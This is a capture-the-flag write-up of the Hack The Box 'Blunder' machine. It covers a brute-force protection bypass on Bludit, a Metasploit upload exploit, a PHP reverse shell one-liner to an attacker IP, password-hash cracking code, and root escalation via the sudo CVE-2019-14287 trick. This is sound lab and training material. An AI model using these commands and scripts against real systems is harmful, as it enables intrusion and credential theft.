
Daniel Cano Merchán - Hacking & Tech

Writeup Hackthebox HTB Blunder

0 - Basic info

OS: Linux

IP: 10.10.10.191

1 - Reconnaissance and enumeration

sudo nmap -sS -sV -sC -O 10.10.10.191
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-28 22:24 CEST
Nmap scan report for 10.10.10.191
Host is up (0.041s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts
Aggressive OS guesses: HP P2000 G3 NAS device (91%), Linux 2.6.32 (90%), Infomir MAG-250 set-top box (90%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (90%), Ubiquiti AirOS 5.5.9 (90%), Linux 2.6.32 - 3.13 (89%), Linux 3.3 (89%), Linux 2.6.32 - 3.1 (89%), Linux 3.7 (89%), Netgear RAIDiator 4.2.21 (Linux 2.6.37) (89%)
No exact OS matches for host (test conditions non-ideal).

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.48 seconds

The first scan with Dirbuster shows the admin page /admin, a /todo.txt and the robots.txt:

http://10.10.10.191/admin/

The admin panel is branded BLUDIT. A quick search shows that Bludit is a flat-file CMS for blogging (it keeps its data, including the user database, in PHP/JSON files rather than in a database server).

Nothing useful in robots.txt, but todo.txt has interesting info:

10.10.10.191/todo.txt

-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

This gives a first username, fergus, and "Update the CMS" is very interesting: the site admin knows the CMS is outdated, so there is probably a known, unpatched vulnerability in the installed version.

So, searching exploits for Bludit:

searchsploit bludit

Bludit - Directory Traversal Image File Upload (Metasploit)
Bludit 3.9.12 - Directory Traversal 
bludit Pages Editor 3.0.0 - Arbitrary File Upload

Looking at the page source:

<!-- CSS -->
<link rel="stylesheet" type="text/css" href="http://10.10.10.191/bl-kernel/css/bootstrap.min.css?version=3.9.2">
<link rel="stylesheet" type="text/css" href="http://10.10.10.191/bl-kernel/admin/themes/booty/css/bludit.css?version=3.9.2">
<link rel="stylesheet" type="text/css" href="http://10.10.10.191/bl-kernel/admin/themes/booty/css/bludit.bootstrap.css?version=3.9.2">

The Bludit version is 3.9.2

2 - Vulnerability Identification

I also found:

https://rastating.github.io/bludit-brute-force-mitigation-bypass/

This post explains how to bypass Bludit's brute-force protection: after ten failed logins Bludit blacklists the client IP, but it reads that IP from the X-Forwarded-For header when one is present, so an attacker can send a different fake address on every attempt and never get blocked. Each login also needs a valid CSRF token, which has to be read from the login page before every POST. Hydra cannot do both out of the box, so I need a custom script to brute-force the admin page.

3 - Exploit

Brute-force protection bypass script for Bludit 3.9.2:

https://github.com/musyoka101/Bludit-CMS-Version-3.9.2-Brute-Force-Protection-Bypass-script/tree/master

Using the user fergus and brute-forcing with the well-known rockyou.txt wordlist:

python exploit.py 10.10.10.191 fergus /usr/share/wordlists/rockyou.txt

But it did not work.

Trying again with a custom wordlist built by cewl: the target is a blog, so its pages are a rich source of words, and the blogger may well have used one of them as a password.

Custom wordlist

https://tools.kali.org/password-attacks/cewl

cewl -d 2 -m 6 -w docswords.txt 10.10.10.191

And brute-forcing again:

python exploit.py 10.10.10.191 fergus custom.txt 
[*] Trying: Plugins
[*] Trying: Include
[*] Trying: service
[*] Trying: Stadia
[*] Trying: Dynamic
[*] Trying: blunder
[*] Trying: interesting
[*] Trying: devices
[*] Trying: Google
[*] Trying: content
[*] Trying: created
[*] Trying: Creation
[*] Trying: November
[*] Trying: Reading
[*] Trying: minute
[*] Trying: Awards
[*] Trying: Fantasy
[*] Trying: National
[*] Trying: players
[*] Trying: allows
[*] Trying: stream
[*] Trying: description
[*] Trying: Favicon
[*] Trying: Bootstrap
[*] Trying: bootstrap
[*] Trying: Styles
[*] Trying: Robots
[*] Trying: plugin
[*] Trying: Navbar
[*] Trying: Static
[*] Trying: Social
[*] Trying: Networks
[*] Trying: Content
[*] Trying: Stephen
[*] Trying: Sidebar
[*] Trying: nothing
[*] Trying: Footer
[*] Trying: Copyright
[*] Trying: Powered
[*] Trying: byEgotisticalSW
[*] Trying: Javascript
[*] Trying: American
[*] Trying: fiction
[*] Trying: novels
[*] Trying: feature
[*] Trying: series
[*] Trying: published
[*] Trying: received
[*] Trying: awarded
[*] Trying: literature
[*] Trying: centers
[*] Trying: through
[*] Trying: smartphones
[*] Trying: tablets
[*] Trying: library
[*] Trying: Breaked
[*] Trying: button
[*] Trying: September
[*] Trying: author
[*] Trying: horror
[*] Trying: supernatural
[*] Trying: suspense
[*] Trying: fantasy
[*] Trying: million
[*] Trying: copies
[*] Trying: adapted
[*] Trying: miniseries
[*] Trying: television
[*] Trying: including
[*] Trying: Richard
[*] Trying: Bachman
[*] Trying: written
[*] Trying: approximately
[*] Trying: stories
[*] Trying: collections
[*] Trying: Stoker
[*] Trying: British
[*] Trying: Society
[*] Trying: Foundation
[*] Trying: Distinguished
[*] Trying: Contribution
[*] Trying: Letters
[*] Trying: probably
[*] Trying: fictional
[*] Trying: character
[*] Trying: RolandDeschain
()
SUCCESS: Password found!
Use fergus:RolandDeschain to login.
()

Great, the password is RolandDeschain and I can log into the admin panel.


Metasploit

Now I can use one of the exploits found earlier (the image-upload directory traversal, CVE-2019-16113). This time I used Metasploit:

linux/http/bludit_upload_images_exec

msf5 exploit(linux/http/bludit_upload_images_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.5:8443 
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading zcoxmsbSZa.png...
[*] Uploading .htaccess...
[*] Executing zcoxmsbSZa.png...
[*] Command shell session 1 opened (10.10.14.5:8443 -> 10.10.10.191:39706) at 2020-07-29 20:18:58 +0200
[+] Deleted .htaccess

pwd
/var/www/bludit-3.9.2/bl-content/tmp

Good, shell access as www-data. I cannot read the user flag with it, so I need to get access to a real user account.

User hashes

Enumerating the blog's files I found the user database (bl-content/databases/users.php):

cat users.php

<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Admin",
        "firstName": "Administrator",
        "lastName": "",
        "role": "admin",
        "password": "bfcc887f62e36ea019e3295aafb8a3885966e265",
        "salt": "5dde2887e7aca",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""
    },
    "fergus": {
        "firstName": "",
        "lastName": "",
        "nickname": "",
        "description": "",
        "role": "author",
        "password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7",
        "salt": "jqxpjfnv",
        "email": "",
        "registered": "2019-11-27 13:26:44",
        "tokenRemember": "",
        "tokenAuth": "0e8011811356c0c5bd2211cba8c50471",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "codepen": "",
        "instagram": "",
        "github": "",
        "gitlab": "",
        "linkedin": "",
        "mastodon": ""
    }
}

Identifying the hashes

Two users with hashes.

Using hash-identifier to identify the hashes:

hash-identifier bfcc887f62e36ea019e3295aafb8a3885966e265

Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))

Least Possible Hashs:
[+] Tiger-160
[+] Haval-160
[+] RipeMD-160
[+] SHA-1(HMAC)
[+] Tiger-160(HMAC)
[+] RipeMD-160(HMAC)
[+] Haval-160(HMAC)
[+] SHA-1(MaNGOS)
[+] SHA-1(MaNGOS2)
[+] sha1($pass.$salt)
[+] sha1($salt.$pass)
[+] sha1($salt.md5($pass))
[+] sha1($salt.md5($pass).$salt)
[+] sha1($salt.sha1($pass))
[+] sha1($salt.sha1($salt.sha1($pass)))
[+] sha1($username.$pass)
[+] sha1($username.$pass.$salt)
[+] sha1(md5($pass))
[+] sha1(md5($pass).$salt)
[+] sha1(md5(sha1($pass)))
[+] sha1(sha1($pass))
[+] sha1(sha1($pass).$salt)
[+] sha1(sha1($pass).substr($pass,0,3))
[+] sha1(sha1($salt.$pass))
[+] sha1(sha1(sha1($pass)))
[+] sha1(strtolower($username).$pass)

But I could not crack the hash or find it on any hash-cracking website.

Hash #2

Enumerating again, I found another version (3.10.0a) of Bludit with a different users file:

/var/bludit/3.10.0a/bl-content/databases/users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""}
}

A new user, Hugo, with a password hash and no salt. This time I was lucky and the password was already cracked:


Password120
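Both hash sections above (the salted 3.9.2 hashes that would not crack, and Hugo's unsalted 3.10.0a hash that did) come down to knowing Bludit's scheme: its Users::generatePasswordHash() returns sha1($password . $salt), and a record without a "salt" key is just sha1($password). The following is an added example, not the page's tooling nor Bludit code: it strips the PHP guard line from a users.php, hashes candidates the way Bludit does, and prints the matching hashcat invocation (-m 110 for sha1($pass.$salt), -m 100 for plain SHA-1). The two users.php fragments are constructed from the files shown above and the wordlist is a made-up handful of candidates.

```python
#!/usr/bin/env python3
"""Parse Bludit users.php files and crack their SHA-1 hashes with Bludit's own scheme.

Added example for this writeup; the inputs below are constructed from the page.
"""
import hashlib
import json
from typing import Dict, Iterable, List, Tuple

# Trimmed copy of /var/www/bludit-3.9.2/bl-content/databases/users.php (salted records)
USERS_392 = """<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {"role": "admin", "password": "bfcc887f62e36ea019e3295aafb8a3885966e265", "salt": "5dde2887e7aca"},
    "fergus": {"role": "author", "password": "be5e169cdf51bd4c878ae89a0a89de9cc0c9d8c7", "salt": "jqxpjfnv"}
}"""

# Trimmed copy of /var/bludit/3.10.0a/bl-content/databases/users.php (no salt key)
USERS_310 = """<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {"nickname": "Hugo", "role": "User", "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d"}
}"""

# Constructed mini wordlist; on a real engagement point this at rockyou or a cewl list.
WORDLIST = ["password", "Password120", "RolandDeschain", "blunder", "admin123"]


def parse_users_php(text: str) -> Dict[str, dict]:
    """users.php is a one-line PHP guard followed by a JSON object; drop the guard."""
    return json.loads(text[text.index("{"):])


def bludit_hash(password: str, salt: str = "") -> str:
    """sha1($password . $salt), exactly as Bludit computes it; no salt means plain sha1."""
    return hashlib.sha1((password + salt).encode()).hexdigest()


def crack(users: Dict[str, dict], wordlist: Iterable[str]) -> Dict[str, str]:
    """Return {account: password} for every record whose hash matches a candidate."""
    words = list(wordlist)
    found: Dict[str, str] = {}
    for account, rec in users.items():
        target = rec["password"].lower()
        salt = rec.get("salt", "")
        for candidate in words:
            if bludit_hash(candidate, salt) == target:
                found[account] = candidate
                break
    return found


def hashcat_lines(users: Dict[str, dict]) -> List[Tuple[str, str, int]]:
    """(account, hash[:salt], hashcat mode): 110 = sha1($pass.$salt), 100 = plain SHA-1."""
    out = []
    for account, rec in users.items():
        salt = rec.get("salt")
        if salt:
            out.append((account, f"{rec['password']}:{salt}", 110))
        else:
            out.append((account, rec["password"], 100))
    return out


if __name__ == "__main__":
    for label, blob in (("bludit-3.9.2", USERS_392), ("bludit-3.10.0a", USERS_310)):
        users = parse_users_php(blob)
        print(f"== {label} ==")
        for account, password in crack(users, WORDLIST).items():
            print(f"  cracked {account}: {password}")
        for account, line, mode in hashcat_lines(users):
            print(f"  hashcat -m {mode} '{line}' /usr/share/wordlists/rockyou.txt   # {account}")
```

The practical lesson is that hash-identifier can only guess the algorithm family; the concatenation order and the salt come from the application source, and guessing them wrong (for instance hashcat -m 120, salt first) silently cracks nothing.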

Another reverse shell?

I tried to switch to the user Hugo, but my shell sucked and was unstable…

So I started another reverse shell:

nc -lvp 8888
php -r '$sock=fsockopen("10.10.14.5",8888);exec("/bin/sh -i <&3 >&3 2>&3");'

And upgraded the shell with Python:

python3 -c "import pty;pty.spawn('/bin/bash')"

User shell and flag

Now I can log in as Hugo:

www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ su - hugo
Password: Password120

hugo@blunder:~$ ls
Desktop    Downloads  Pictures  Templates  Videos
Documents  Music      Public    user.txt

hugo@blunder:~$ cat user.txt
e0f8[...]d3a5

4 - Post-Exploitation and privilege escalation

This part is about how to get root as Hugo.

I started by checking the sudo permissions:

hugo@blunder:/$ sudo -l

Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash

CVE-2019-14287 sudo

I immediately recognised the flaw and its CVE, for sudo 1.8.27 (every release before 1.8.28 is affected):

https://access.redhat.com/security/cve/cve-2019-14287

This CVE was famous because it affected a huge number of Linux distributions and is trivial to exploit. sudo did not handle the target user ID properly: a rule of the form (ALL, !root) allows a command as any user except root, but the user ID -1 (or its unsigned form, 4294967295) does not match the uid 0 exclusion, and since setresuid() treats -1 as "leave unchanged", the command keeps sudo's own effective uid, which is 0. It only works when sudoers contains a rule like this:

(ALL, !root) /usr/bin/somecommand
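A quick way to check for both preconditions at once, as an added example (not part of the original writeup): one function looks for a "(ALL, !root)"-style runas spec in sudo -l output, another compares the sudo version against 1.8.28, the first fixed release. The rule text is the sudo -l output shown above; the version line is an assumed first line of sudo -V for a 1.8.27 build. Run with --live on a real host to feed it the actual sudo output.

```sh
#!/bin/sh
# CVE-2019-14287 precondition check, added example for this writeup.

# Constructed samples: the rule is the sudo -l output above, the version line
# is what `sudo -V | head -n 1` prints for 1.8.27 (assumed).
SAMPLE_SUDO_L='User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash'
SAMPLE_SUDO_V='Sudo version 1.8.27'

# 0 if the rule text contains a runas spec of the form "(ALL, !root)", i.e.
# "any user except root", allowing optional whitespace; 1 otherwise.
has_bang_root_rule() {
    printf '%s\n' "$1" | grep -Eq '\(ALL[[:space:]]*,[[:space:]]*!root\)'
}

# Print the dotted version (e.g. 1.8.27 or 1.9.5p2) from a "Sudo version ..." line.
parse_sudo_version() {
    printf '%s\n' "$1" | sed -n 's/^Sudo version \([0-9][0-9.p]*\).*/\1/p'
}

# 0 if the version is older than 1.8.28, the first release that rejects uid -1.
sudo_version_vulnerable() {
    major=$(printf '%s\n' "$1" | cut -d. -f1 | sed 's/[^0-9].*//')
    minor=$(printf '%s\n' "$1" | cut -s -d. -f2 | sed 's/[^0-9].*//')
    patch=$(printf '%s\n' "$1" | cut -s -d. -f3 | sed 's/[^0-9].*//')   # "27p1" -> 27
    n=$(( ${major:-0} * 1000000 + ${minor:-0} * 1000 + ${patch:-0} ))
    [ "$n" -lt 1008028 ]   # 1.8.28 == 1008028
}

# Combine both checks; 0 and a hint when exploitable, 1 otherwise.
assess() {
    rules="$1"
    ver=$(parse_sudo_version "$2")
    if has_bang_root_rule "$rules" && sudo_version_vulnerable "$ver"; then
        echo "VULNERABLE: sudo $ver with a (ALL, !root) rule; run the listed command as: sudo -u#-1 <command>"
        return 0
    fi
    echo "not exploitable via CVE-2019-14287 (sudo version: ${ver:-unknown})"
    return 1
}

if [ "${1:-}" = "--live" ]; then
    assess "$(sudo -n -l 2>/dev/null)" "$(sudo -V 2>/dev/null | head -n 1)"
else
    assess "$SAMPLE_SUDO_L" "$SAMPLE_SUDO_V"
fi
```

Note that the rule's command is what you get to run as root, so (ALL, !root) /bin/bash hands over a full shell, whereas a more restricted command would need its own escape.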

Root shell and flag

Great, this means I can use the user ID -1 to execute /bin/bash as root:

hugo@blunder:/$ sudo -u#-1 /bin/bash
root@blunder:/# cat /root/root.txt
bcb[...]7d1

Thanks for reading!